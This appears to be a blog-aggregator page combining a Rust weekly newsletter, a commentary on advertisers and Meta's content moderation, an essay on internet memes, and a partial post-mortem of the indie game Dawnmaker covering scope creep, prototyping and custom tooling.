Each user could give each feature 1 to 5 votes. A total of 154 Pontoon users participated in the survey, 68 of which voted on all features. The number of participants is lower than in the past years, since we only reached out to users who explicitly opted-in to email updates.

We look forward to implementing these new features and working towards a more seamless and efficient translation experience with Pontoon. Stay tuned for updates!

This Week In RustThis Week in Rust 584

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is embed_it, a crate that helps you to embed assets into your binary and generates structs / trait implementations for each file or directory.

Thanks to Riberk for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.


Call for Participation

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

408 pull requests were merged in the last week

Rust Compiler Performance Triage

Relatively quiet week, with one large-ish regression that will be reverted. #132666 produced a nice perf. win, by skipping unnecessary work. This PR actually reversed a regression caused by a previous PR.

Triage done by @kobzol.

Revision range: 9a1d156f..f7538506

Summary:

(instructions:u)            mean    range            count
Regressions ❌ (primary)     0.5%   [0.2%, 2.2%]     42
Regressions ❌ (secondary)   2.1%   [0.1%, 11.6%]    56
Improvements ✅ (primary)   -0.8%   [-4.2%, -0.1%]   107
Improvements ✅ (secondary) -1.2%   [-4.0%, -0.1%]   77
All ❌✅ (primary)           -0.5%   [-4.2%, 2.2%]    149

2 Regressions, 3 Improvements, 2 Mixed; 4 of them in rollups. 45 artifact comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs
  • No New or Updated RFCs were created this week.

Upcoming Events

Rusty Events between 2025-01-29 - 2025-02-26 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I have experience in multiple styles of MMA gained from fighting the borrow checker, if that counts.

Richard Neumann on rust-users

Thanks to Jonas Fassbender for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don Martitime to sharpen your pencils, people

Mariana Olaizola Rosenblat covers How Meta Turned Its Back on Human Rights for Tech Policy Press. Zuckerberg announced that his company will no longer work to detect abuses of its platforms other than high-severity violations of content policy, such as those involving illicit drugs, terrorism, and child sexual exploitation. The clear implication is that the company will no longer strive to police its platform against other harmful content, including hate speech and targeted harassment.

Sounds like a brand-unsafe environment. So is another rush of advertiser boycott stories coming? Not this time. Lara O’Reilly reports that brand safety has recently become a political hot potato and been a flash point for some influential, right-leaning figures. In uncertain times, marketing decision-makers are keeping a low profile. Most companies aren’t really set up to take on the open-ended security risk of coming out against hate speech by users with friends in high places. According to the Fraternal Order of Police, the January 6 pardons send a dangerous message, and that message is being heard in marketing departments. The CMOs who boycotted last time are fully aware that stochastic terrorism is a thing, and that rage stories about companies spread quickly in Facebook groups and other extremist media. If an executive makes the news for pulling ads from Meta, they would be putting employees at risk from lone, deniable attacks. So instead of announcing a high-profile boycott, marketers are more likely to follow the example of Federal employees and do the right thing, by the book, and quietly.

Fortunately, big advertisers got some lower-stakes practice with the X (formerly Twitter) situation. Instead of either (1) staying on there and putting the brand at risk of being associated with material copied out of Henry Ford’s old newspaper or (2) risking getting snarled up in a lawsuit for pulling the X ads entirely, brands got the best of both by cutting way back on the actual money without dropping X entirely or saying much one way or the other.

And it’s possible for advertisers to reduce support for Meta without making a stink or drawing fire. Fortunately, Meta ads are hella expensive, and results can be unrealistic and unsustainable. Like all the Big Tech companies these days, Meta is coping with a slowdown in innovation by tweaking the ad rules to capture more revenue from existing services. As Jakob Nielsen pointed out back in 2006, in Search Engines as Leeches on the Web, ad platforms can even capture the value created by others. A marketer doesn’t have to shout ¡No Pasarán! or anything—just sharpen your best math pencil, quietly go through the numbers, spot something that looks low-ROAS or fraudulent in the Meta column, tweak the budget, repeat. If users can dial down Meta, so can marketers. (Update: Richard Kirk writes, Brands could be spending three times too much on social. You read that right. Read the math, do the math.) And if Meta comes out with something new and risky like the adfraud in the browser thing, Privacy-Preserving Attribution, it’s easy to use the fraud problem as the reason not to do it—you don’t have to stand up and talk politics at work.

From the user side

It’s not that hard to take privacy measures that result in less money for Big Tech. Even if you can’t quit Meta entirely, some basic tools and settings can make an impact, especially if you use both a laptop and a phone, not just a phone. With a few minutes of work, an individual in the USA can, in effect, fine the surveillance business about $50/month.

My list of effective privacy tips is prioritized by how much I think they’ll cost the surveillance business per minute spent. A privacy tips list for people who don’t like doing privacy tips but also don’t like creepy oligarchs. (As they say in the clickbait business, number 9 will shock you: if you get your web browser info from TV and social media, you probably won’t guess which browsers have built-in surveillance and/or fraud features.) That page also has links to more intensive privacy advice for those who want to get into it.

A lawyer question

As an Internet user, I realize I can’t get to Meta surveillance neutral just with my own privacy tools and settings. For the foreseeable future, companies are going to be doing server-to-server tracking of me with Meta CAPI.

So in order to get to a rough equivalent of not being surveilled, I need to balance out their actual surveillance by introducing some free speech into the system. (And yes, numbers can be speech. O, the Tables tell!) So what I’d like to do is write a surrogate script (that can be swapped in by a browser extension in place of the real Meta Pixel, like the surrogate scripts uBlock Origin uses) to enable the user to send something other than valid surveillance data. The user would configure what message the script would send. The surrogate script would then encode the message and pass it to Meta in place of the surveillance data sent by the original Meta script. There is a possible research angle to this, since I think that in general, reducing ad personalization tends to help people buy better products and services. An experiment would probably show that people who mess with cross-context surveillance are happier with their purchases than those who allow surveillance. Releasing a script like that is the kind of thing I could catch hell for, legally, so I’m going to wait to write it until I can find a place to host it and a lawyer to represent me. Anyone?

Related

Big Tech platforms: mall, newspaper, or something else?

Sunday Internet optimism

Bonus links

After Big Social. Dan Phiffer covers the question of where to next. I am going into this clear-eyed; I’m going to end up losing touch with a lot of people. For many of my contacts, Meta controls the only connection we have. It’s a real loss, withdrawing from communities that I’ve built up over the years (or decades in the case of Facebook). But I’m also finding new communities with different people on the networks I’m spending more time in.

No Cookies For You!: Evaluating The Promises Of Big Tech’s ‘Privacy-Enhancing’ Techniques Kirsten Martin, Helen Nissenbaum, and Vitaly Shmatikov cover the problems with privacy-enhancing Big Tech features. (Not everything with privacy in its name is a privacy feature. It’s like open I guess.)

The Mozilla BlogIYKYK: The secret language of memes

A meme-style image featuring a man looking back in surprise while his female companion gestures in disbelief, overlaid with colorful speech bubbles saying "IKR?" and emoji-style icons.

A smiling woman with long dark hair, wearing colorful earrings and a navy blue polka dot top, in front of a turquoise background.
Dr. Erica Brozovsky is a sociolinguist, a public scholar and a lover of words. She is the host of Otherwords, a PBS series on language and linguistics, and a professor of writing and rhetoric at Worcester Polytechnic Institute. You can find her at @ericabrozovsky on most platforms. Photo: Kelly Zhu

If you’ve been on the internet anytime in the past 25 years, there’s a good chance you’ve seen a meme, shared a meme, or perhaps even created a meme. From the LOLcats and Advice Animals of the mid 2000s to the many emotions of Moo Deng, the world’s favorite pygmy hippopotamus, internet memes allow us to share pieces of media that we find funny, ironic or relatable.

Author Mike Godwin coined the term “internet meme” in the June 1993 edition of Wired magazine. However, that wasn’t the advent of the word meme. In his 1976 book, “The Selfish Gene,” evolutionary biologist Richard Dawkins conceived the term to represent “ideas, behaviors, or styles that spread from person to person.” If you think that sounds a bit contagious, you’re absolutely correct. Much as contagion spreads, so does the imitation of ideas in the form of memes, circulating humor across society.

But who claims the crown of first ever internet meme? Is it the 1998 Hamster Dance gif created by Deidre LaCarte as a GeoCities page?

Or is it the 1996 Autodesk Dancing Baby that has now become an NFT? (Creator Michael Girard claims so.)

Those definitely went viral, but are they memes? Perhaps not. A funny image (or gif or video) is just a funny image… or gif, or video… unless it achieves the two keys to memehood: inspiring creative variations (that are then copied and spread) and being imbued with cultural context, like that Pepperidge Farm meme (iykyk).

The Cow Guide, for example, might be considered a precursor to the internet meme.

Full of ASCII character drawings of variations on cows, The Cow Guide spread on Usenet in the ‘80s and ‘90s (pre-World Wide Web), with people adding new cows with every repost. While memes do exist offline, internet memes really took off in the 2000s within anonymous web communities like 4chan — which required images with each post — and Reddit and Tumblr, which debuted in 2003, 2005, and 2007, respectively. In the late aughts, internet curators like BuzzFeed and social media sites made memes more mainstream. And now they’re everywhere.

Meme culture is so quick, with turnaround and multiple iterations within minutes of an event happening. Even if the source material is a real and consequential topic, a funny meme brings attention, as humor and levity travel further and faster than seriousness and sincerity.

Global and national events (like the Olympics and the U.S. presidential election) are goldmines for meme-able opportunities that allow information to spread faster than the traditional news cycle. Take, for instance, Stephen Nedoroscik, Team USA’s horse powerhouse, who became the subject of countless memes for his incredible performance and comparisons to Clark Kent.

But how is it that memes are significant enough to have given rise to an entire academic field — memetics — and a category in the Library of Congress? The U.K.’s National Science and Media Museum is even putting this absolute unit on display as their first “digitally-born object.”

Are memes useful for more than just laughs or, more realistically, those small exhales through the nose of mild amusement?

Definitively, yes. Here’s a comparison: A minute is a unit of time, a meter is a unit of measure, and a meme is a unit of culture. Today internet memes (which we’ll just call memes) can be described as “units of popular culture that are circulated, imitated, and transformed by internet users, creating a shared cultural experience.” The key part of that definition is the creation of a shared cultural experience. That seems pretty deep for something so trivial as a reaction GIF or silly picture with text slapped on it, but it’s true. 

Think of it this way: Have you ever made a reference, maybe to a movie, a song lyric, a book or a funny TikTok you saw, only to be met with silence or questioning looks from the group you’re talking to? When even just one other person gets the reference, you feel a sense of kinship; you know the two of you have something in common. This is what happens with memes. The internet is so vast now that we’re not all part of the same communities online, so when you “get” a meme, there’s a shared sense of humor and a feeling of belonging. And laughing together strengthens relationships and fosters community, making you feel closer.

Nowadays, memes have grown into the mainstream, many making it outside of their original subculture to become widely culturally relevant. And the faces behind some popular memes have gained celebrity status even offline. Case in point: In early November 2024, the people behind three iconic memes of the 2010s met up, causing an internet uproar.

There’s a meme out there for every facet of your identity and every interest you hold, from a corporate job to a keen interest in birdwatching to crossovers between Pokémon and Thomas the Tank Engine. When multiple specific interests collide in a meme… well there’s a reason the phrase “I’ve never had an original thought or experience” became so popular online.

That’s not even touching the surface of the weird, wild and wonderful world of niche memes. And that is exactly where the hyper-specific meme shines in its ability to broker connections. If you can parse through the layers of meaning and referential humor, then you’re part of the exclusive club of people in the know. 

Today, we can be defined by the media we consume, so understanding a meme, especially if it’s highly intertextual and referential, gives insight into who a person is and what corners of the internet they inhabit. Memes serve as inside jokes for subcommunities online, and the more iterations and riffs on the joke, the higher barrier to entry for outsiders, further cementing the group’s identity. If you understand a niche meme, you come to realize you’re part of a very specific collective of internet users, for better or for worse.

Memes are digital manifestations of shared online experiences and interactions. They have set structures and social dynamics, and by intertextually referencing various pop culture tokens, they show affiliation and affinity to specific internet subgroups. They subtly ask if you understand, and if you do (and iykyk), you’re initiated into the club as “one of us, one of us!” Memes are not random. They’re created to appeal to a specific chosen audience who will then hopefully pass on the meme like a contagion of amusement because they identify with it.

We share memes because we assume our audience, upon wading through the subtext, will find them worthwhile, whether because of humor or in-group membership. Whether posting into the void that is Tumblr or 4chan or Reddit, or sending memes directly to your friends or family in a form of digital pebbling — like penguins presenting smooth stones to their prospective mates in courtship rituals — spreading these internet cultural tokens is a bid for social connection. And through that connection, we show affiliation with others who understand the digital inside joke that is a shared piece of popular culture. Memes are cultural artifacts and efficient forms of communication to those who understand the context. And oftentimes they’re funny, which is just an added bonus. Put simply, humans crave connection, and memes just do it for us. 


The post IYKYK: The secret language of memes appeared first on The Mozilla Blog.

Adrian Gaudebert3 years of intense learning - The Dawnmaker Post-mortem

It's been 3 years since I started working on Dawnmaker full-time with Alexis. The creation of our first commercial game coincided with the creation of Arpentor Studio, our company. I've shared a lot of insights along the way on this blog, from how we did our first market research (which was incredibly wrong) to how much we made with our game (look at the difference between the two, it's… interesting). I wrote a pretty big piece where I explained how we built Arpentor Studio. I wrote a dozen smaller posts about the development of Dawnmaker. And I shared a bunch of my feelings, mistakes and successes in my yearly State of the Adrian posts (in French only, sorry).

But today, I want to take a step back and give a good look at these last 3 years. It's time for the Dawnmaker post-mortem, where I'm going to share what I believe we did well, what we did wrong, and what I've learned along the way. Because Dawnmaker and Arpentor Studio are so intertwined, I'm inevitably going to talk about the studio as well, but I think it makes sense. Let's get started!

What we did

Let's get some context first. Dawnmaker is a solo strategy game, mixing city building and deckbuilding to create a board game-like experience. It was released in July 2024 on Steam and itch.io. The team consisted of 2 full-time people, with occasional help from freelancers. My associate Alexis took care of everything related to graphics, and I did the programming and game design of the game. If you're interested in how much the game sold, I wrote a blog post about this: 18 days of selling Dawnmaker.

Dawnmaker capsule

I created the very first prototype of what would become Dawnmaker back in the summer of 2021, but we only started working on the game full-time in December of that year. We joined a local incubator in 2022, which kind of shook our plans: we spent a significant portion of our time working on administrative things around the game, like making pitch decks and funding briefs. We had to create a company earlier than we had planned in order to apply for public funding. So in 2022 we only spent about half our time actually working on developing the game. In 2023, after being rejected for our main source of funding, we shrunk down our ambitions and focused on just making the game. We still spent time improving our pitch deck and contacting some publishers, but never managed to secure a deal. In early 2024, we decided to self-publish, started our Steam page and worked on promoting the game while polishing what we had.

Because we never found a publisher, we never had the money to do the production phase of Dawnmaker. That means the game shipped with about half the content we wanted it to have. Here are my definitions of the different phases of a game project, as I'll refer to them later on in this article:

  1. Ideation — The phase where we are defining the key concepts of the game we want to make. There's some early prototyping there, as well as research. The goal is to have a clear picture of what we want to build.
  2. Pre-production — The phase where we validate what the core of the game is, that it is fun, and that we will be able to actually deliver it. It can be cut down into three steps: prototyping, pre-production and vertical slice. In prototyping we validate the vision of the game. In pre-production (yes, it's the same name as the phase, but that's what I was taught) we build our production pipeline. During the vertical slice, we validate that the pipeline works and finalize the main systems of the game.
  3. Production — The phase where we build the content of the game. This phase is supposed to be one that can be planned very precisely, because the pre-production has supposedly removed almost all the unknowns.
  4. Post-production — The phase where we polish our game and carry it across the finish line.

Now that you have some context, let's get into the meat of this article!

What we did right

Let's start this post-mortem on a positive note, and list the things that I believe we did well. First and foremost, we actually shipped a game! Each game that comes out is a little miracle, and we succeeded there. We kept our vision, we pushed it as far as we could, and we did not give up. Bravo us!

Good game quality

What's more, our game has been very well received: at the time of writing, we have a 93% positive review ratio on Steam, from 103 reviews. I am of course stoked that Dawnmaker was liked by that many reviewers. I think there are 3 main reasons why we had such positive reviews (other than the game being decently fun, of course):

  1. We kept a demo up at all times, even after the release, meaning that prospective customers could give it a try before buying. If they didn't like the demo, they didn't buy the game — not good for us — but then they were not disappointed by a product they bought — good for them and for our reviews!
  2. We were speaking to a very small niche, but provided something that was good for them. The niche is a weird intersection of deckbuilding, city building and board game fans. It was incredibly difficult to find and talk to, probably because it is, as I said, very small, but we made something that worked very well for those players.
  3. We under-priced the game aggressively (at $9.99) to lower the players' expectations. That came through in the reviews, where a few people mentioned that the game had flaws, but they tolerated them because of the price tag. (Note: the game has since been moved up to a $14.99 price point by our new publisher.)

Of course, had the game been bad, we would not have had those reviews at all. Which is to say: Dawnmaker is a fine game. For all its flaws, it is fun to play. I've played it a lot — as I guess do all game creators with their creation — and it took me a while to get bored with it. The median playtime on Steam is 3 hours and 23 minutes, with an average playtime of 8 hours and 17 minutes. Here's a stat that blows my mind: at the time of writing, 175 people (about 10% of our players) have played Dawnmaker for more than 20 hours. At least 15 people played it for more than 50 hours. I know this is far from the life-devouring monsters that are out there, like Civilization, Skyrim, Minecraft or GTA, but for our humble game and for me, that's incredible to think about.

So, we made a fun game. I think we succeeded there by just spending a lot of time in pre-production. Truth be told, we spent about 2 years in that phase, only 6 months in post-production, and we did not really do a real production phase. For 2 years, we were testing the game and making deep changes to its core, iterating until we found the best version of this game we could. Mind you, 2 years was way too long a time, and I'll get back to that in the failures section. But I believe the reason why Dawnmaker was enjoyed by our players is because we took that time to improve it.

Lesson learned

Make good games?

The art of the game was also well received, and here again I think time was the key factor. It took a long time to land on the final art direction. There was a point where the game had a 3D board, and it was… not good. I think one of our major successes, from a production point of view, was to pivot to a 2D board. That simplified a lot of things in terms of programming and performance, and let us land on that much, much better art style. It took a long time but we got there.

Screenshot of the first prototype of Dawnmaker <figcaption>The first prototype of Dawnmaker, which had sound for some reason…</figcaption>

There's one last aspect that I think mattered in the success of the game, and for which I am particularly proud: the game had very few bugs upon release, and none were blocking. I've achieved that by prioritizing bug fixing at all times during the development of the game. I consider that at any point in time, and with very few exceptions, fixing a known bug is higher priority than anything else. Of course this is easier done when there is a single programmer, who knows the entire code base, but I'm convinced that, if you want to ship bug-free products, bug fixing must not be an afterthought, a thing that you do in post-production. If you keep a bug-free game at all times during development, chances are very high that you'll ship a bug-free game!

Lesson learned

Keeping track of bugs and fixing them as early as possible makes your life easier when you're nearing release, because you don't have to spend time chasing bugs in code that you wrote months or years before. Always reserve time for bug fixing in your planning!

Custom tooling

Speaking of programming, a noticeable part of my time was spent creating a custom tool to handle the game's data. Because we're using a custom tech stack, and not a generic game engine, we did not have access to pre-made tooling. But, since I was in control of the full code of the game, I have been able to create a tool that I'm very happy with.

First a little bit of context: Dawnmaker is coded with Web technologies. What it means is that it's essentially a website, or more specifically, a web app. Dawnmaker runs in a browser. Heck, for most of the development of the game, we did our playtests in browsers! That was super convenient: you want someone to test your game? They can open their favorite browser to the URL of the game, and tada, they can play! No need to download or install anything, no need to worry about updates, they always have the latest version of the game there.

Because our game is web-based, I was able to create a content editor, also web-based, that could run the game. So we have this editor that is a convenient way to edit a database, where all the data about Dawnmaker sits. The cool thing is that, when one of us would make a change to the data, we could click a button right there in the editor, and immediately start playing the game with the changes we just made. No need to download data, build locally, or go through other cumbersome steps. One click, and you're in the game, with all the debug tools and conveniences you need. Another click, and you're back to the editor, ready to make further changes.
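That edit-then-play loop can be sketched roughly like this (a minimal TypeScript sketch; all names are hypothetical, and an in-memory store stands in for the real database behind the web app):

```typescript
// Hypothetical sketch of the editor's edit-then-play data flow.
// In the real tool the data lives in a database behind a web app;
// here an in-memory store stands in for it.

interface BuildingData {
  id: string;
  name: string;
  cost: number;
}

class ContentStore {
  private buildings = new Map<string, BuildingData>();

  // The editor writes changes here...
  upsert(building: BuildingData): void {
    this.buildings.set(building.id, building);
  }

  // ...and the "play" button reads the current state straight into
  // the game, with no download or build step in between.
  exportForGame(): BuildingData[] {
    return [...this.buildings.values()];
  }
}

// One click in the editor: boot the game with the freshly exported data.
function playWithLatestData(store: ContentStore): string {
  return `game started with ${store.exportForGame().length} buildings`;
}

const store = new ContentStore();
store.upsert({ id: "sawmill", name: "Sawmill", cost: 3 });
store.upsert({ id: "market", name: "Market", cost: 5 });
store.upsert({ id: "sawmill", name: "Sawmill", cost: 2 }); // edit in place
console.log(playWithLatestData(store)); // "game started with 2 buildings"
```

The design choice that makes the one-click loop work is that the game always reads from the same live store the editor writes to, so there is never an export or build step between an edit and a playtest.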

Screenshot of the Dawnmaker content editor <figcaption>Screenshot of the Dawnmaker content editor</figcaption>

That tool evolved over time to also handle the graphical assets related to our buildings. Alexis was able to upload, for each building, its illustration and all the elements composing its tile. I added a spritesheet system that could be used in buildings as animations, with controls to order layers, scale and position elements, and even change the tint of sprites.
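A layered building tile like the one described above might be modeled along these lines (a hypothetical sketch, not the editor's actual schema):

```typescript
// Hypothetical model of a building tile as a stack of sprite layers,
// with the per-layer ordering, scale, position and tint controls
// mentioned above. Names are illustrative only.

interface SpriteLayer {
  sheet: string;   // which spritesheet the frames come from
  order: number;   // z-order within the tile
  scale: number;
  x: number;
  y: number;
  tint?: string;   // optional color multiply, e.g. "#cccccc"
}

// Render order: lowest `order` first, so higher layers draw on top.
// Copies the array so the editor's layer list is never mutated.
function sortLayers(layers: SpriteLayer[]): SpriteLayer[] {
  return [...layers].sort((a, b) => a.order - b.order);
}

const tile: SpriteLayer[] = [
  { sheet: "smoke.png", order: 2, scale: 0.5, x: 10, y: -4, tint: "#cccccc" },
  { sheet: "base.png",  order: 0, scale: 1,   x: 0,  y: 0 },
  { sheet: "roof.png",  order: 1, scale: 1,   x: 0,  y: -8 },
];

console.log(sortLayers(tile).map(l => l.sheet).join(", "));
// "base.png, roof.png, smoke.png"
```

An explicit `order` field, rather than relying on array position, is what lets an editor expose "move layer up/down" controls without reshuffling the underlying data.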

Lesson learned

Tooling is an investment that can pay double: it makes you and your team go faster, and can be reused in future projects. Do not make tools for the sake of making tools of course. Do it only when you know that it will save you time in the end. But if you're smart about it, it can really pay off in the long run.

Long-term company strategy

There's one last thing I believe we did well, that I want to discuss, and it's related to our company strategy. Very early on in the creation of Arpentor Studio, we thought about our long-term strategy: what does our road to success look like? Where do we want to be in 5 to 10 years? Our answer was that we wanted to be known for making strategy games (sorry, lots of strategies in this paragraph) that were deep, both in mechanics and meaning. The end game would be to realistically be able to make my dream competitive card game — something akin to Magic: the Gathering, Hearthstone or Legends of Runeterra.

What we did well is that we did not start at the end, but instead drafted a plan to gather experience, knowledge and money, to put ourselves in a place where we would be confident about launching such an ambitious project. We aimed to start by making a solo game, to avoid the huge complexities of handling multiplayer. We aimed to make a simple strategy game, too, but there we missed our goal, for the game we made was way too original and complex. But still, we managed to stay on track: no multiplayer, simple 2D (even though we went 3D for half a year), and mechanics that were not as heavy as they could have been.

We failed on the execution of the plan, and I'll expand on that later in this post, but we did take the time to make a plan and that's a big success in my opinion.

Lesson learned

Keep things as simple as possible for your first games! We humans have a tendency to make things more complex as we go, increasing the scope, adding cool features and so on. That can be a real problem down the line if you're trying to build a sustainable business. Set yourself some hard constraints early on (for example: no 3D, no narration, no NPCs) and stick to them to make sure you can finish your game in a timely manner.

What we did wrong

It's good to recognize your successes, so that you can repeat them, but it's even more important to take a good look at your failures, so that you can avoid repeating them. We made a lot of mistakes over these past 3 years, both related to Dawnmaker and to Arpentor Studio. I'll start by focusing on the game's production, then move on to the game itself to finally discuss company-related mistakes.

Production mistakes

Scope creep aka "the Nemesis of Game Devs"

The scope of Dawnmaker exploded during its development. It was initially supposed to be a game that we wanted to make in about a year. We ended up working on it for more than two and a half years instead! There are several reasons why the scope got so out of control.

Screenshot of Dawnmaker, July 2022 <figcaption>Dawnmaker in July 2022 — called "Cities of Heksiga" at the time</figcaption>

The first reason is that we were not strict enough in setting deadlines and respecting them. During our (long) preproduction phase, we would work on an iteration of the game, then test it, then realize that it wasn't as good as we wanted it to be, and thus start another iteration. We did this for… a year and a half? Of course, working on a game instead of smaller prototypes didn't help in reaching the right conclusions faster. But we also failed to build a long-term plan, with hard dates for key milestones of the game's development. We were thinking that it was fine, that the game would be better if we spent more time on it. That is definitely true. What we did not account for was that working more would not make the game sell significantly better. I'll get back to that when discussing the company strategy.

Lesson learned

Setting deadlines and respecting them is one of the key abilities to master for shipping games and making money with them. Create a budget and assign delivery dates to key milestones. Revisit these often, to make sure you're on track. If not, you need to reassess your situation as soon as possible. Cut the scope of your work or extend your deadlines, but make sure you adapt the budget and that you have a good understanding of the consequences of making those changes.

The second reason the scope exploded is that we were lured into thinking that getting money was easy, especially public funding, and that we should ask for as much money as we could. To do that, we had to increase the scope of what we were presenting, in the hope that we would receive big money, which would enable other sources of money, and allow us to make a bigger game. The problem we faced was that we shifted our actual work to that new plan, that bigger scope, long before we knew if we would get the money or not. And so instead of working on a 1-year production, insidiously we found ourselves working on a 2 to 3-year production. And then of course, we did not get the money we asked for, and were on a track that required a few hundred thousand euros to fund, with just our personal savings to do it.

I think the trick here is to have two different plans for two different games. Their core is the same, but one is the game that you can realistically make without any sort of funding, and the other is what you could do if you were to receive the money. But we should never start working on the "dream" game until the money is in our bank account. I think that's a terribly difficult thing to do — at least it was for me — and a big trap of starting a game production that relies on external funding.

Lesson learned

Never spend money you do not have. Never start down a path until you're sure you will be able to execute it entirely.

The third reason why the scope got out of control is a bit of a consequence of the first two: we envisioned a bigger game than what we ended up shipping, and did not focus enough on the strength of our core gameplay. We were convinced that we needed to have a meta-progression, a game outside the game, and struggled a lot to figure out what that should be. And as I discuss in the meta-progression section below, I think we failed to do it: our meta-progression is too shallow and doesn't improve the core of the game.

Looking back, I remember conversations we had where we justified the need for this work with the scope of the game, with the price we wanted to sell the game for, and thus with the expectations of our future players. The reasoning was: this is a $20 game, players will expect a lot of replayability, so we need to have a meta-progression that would enable it. I think that was a valid line of thought, if only we were actually making a $20 game. In the end, Dawnmaker was sold for $10. Had we realigned earlier, had we taken a real step back after we realized that we were not getting any significant funding, maybe we would have seen this. For a $10 game, we did not need such a complex meta-progression system. We could have focused more on developing the core of the game, building more content and gameplay systems, and landed on a much simpler progression.

Lesson learned

Things change during the lifetime of a game. Take a step back regularly to ask yourself if the assumptions you made earlier are still valid today.

Prototyping the wrong way

I mentioned earlier that we spent a lot of time in preproduction, working on finding the best version of the core gameplay of our game. I said it was a good thing, but it's also a bad one because it took us way too long to find it. And the reason is simple: we did prototyping wrong.

Screenshot of Dawnmaker, January 2023 <figcaption>Dawnmaker in January 2023</figcaption>

The goal of prototyping is to answer one or a few questions as fast as possible. In order to do that, you need to focus on building just what you need to answer your question, and nothing else. If you start putting actual art in your gameplay prototype, or gameplay in your art prototype, then you're not making a prototype: you're making a game. That's what we did. Too early we started adding art to our gameplay prototype. Our first recorded prototype, which we did in Godot, had some art in it. Basic art, sure, but art nonetheless. The time it took to integrate the art into that prototype is time that was not spent answering the main question the prototype was supposed to answer — at that time: was the core gameplay loop fun?

It might seem inconsequential in a small prototype, but that cost quickly adds up. You're not as agile as you would be if you focused on only one thing. You're solving issues related to your assets instead of focusing on gameplay. And then you're a bit disappointed because it doesn't look too great so you start spending time improving the art. Really quickly you end up building a small game, instead of building a small prototype. Our first prototype even had sound! What the hell? Why did we put sound in a prototype that was crap, and was meant to help us figure out that the gameplay was crap?

Lesson learned

Make your prototypes as small and as focused as possible. Do not mix gameplay and art prototypes. Make sure each prototype answers one question. Prototype as many things as possible before moving on to preproduction.

Not playing to our strengths

I mentioned earlier that we had a 3D board in the game for a few months. Going 3D was a mistake that cost us a lot of time, because I had to program the whole thing, in an environment that had few tools and conveniences — we were not using an engine like Godot or Unity. And I was not good at 3D; I had never worked on a 3D game before, so I had to learn a lot in order to do something functional. The end result was something that worked, but wasn't very pleasant to look at. It had performance issues on my computer, and it had bugs that I had no clue how to debug. We ended up ditching the whole 3D board after a lot of discussions and conflicts. The ultimate nail in the coffin came from a publisher who had been shown the game, and who asked: "what is the added value of 3D for this game?" Being unable to give a satisfying answer, we moved back to a 2D board, and were much better off for it.

Screenshot of Dawnmaker with a 3D board <figcaption>Dawnmaker in June 2023, with a 3D board</figcaption>

So my question is: why did we go 3D for that period of time? I think there were two reasons working together to send us into that trap. The first one is that we did not assess our strengths and weaknesses enough. Alexis's strength was making 3D art, while I had no experience in implementing 3D in a game, and we knew it, but we did not weigh those enough. The second reason is that we did not know enough about our tools to figure out that we could find a good compromise. See, we thought that we could either go 3D and build everything in 3D, from building models in Blender to integrating them on a 3D board in the game, or we could go 2D, which would simplify my work but would force Alexis to draw sprites by hand.

What we figured out later on was that there were tools that allowed Alexis to work in 3D, creating models and animations in Blender, but export everything for a 2D environment very easily. There was a way to have the best of both worlds, exploiting our strengths without requiring us to learn something new and complex — which we definitely did not want to do for our first commercial game. Our mistake was to not take the time to research that, to find that compromise.

Lesson learned

Research the tools at your disposal, and always look for the most efficient way to do things. Play to the strengths of your team, especially for your first games.

Building a vertical slice instead of a horizontal one

We struggled a lot to figure out what our vertical slice should be. How could we prove that our game was viable to a potential investor? That's what the vertical slice is supposed to do, by providing a "slice" of your game that is representative of the final product you intend to build. It's supposed to have a small subset of your content, like a level, with a very high level of polish. How do you do that for a game that is systemic in nature? How do you build the equivalent of a "level" of a game like Dawnmaker?

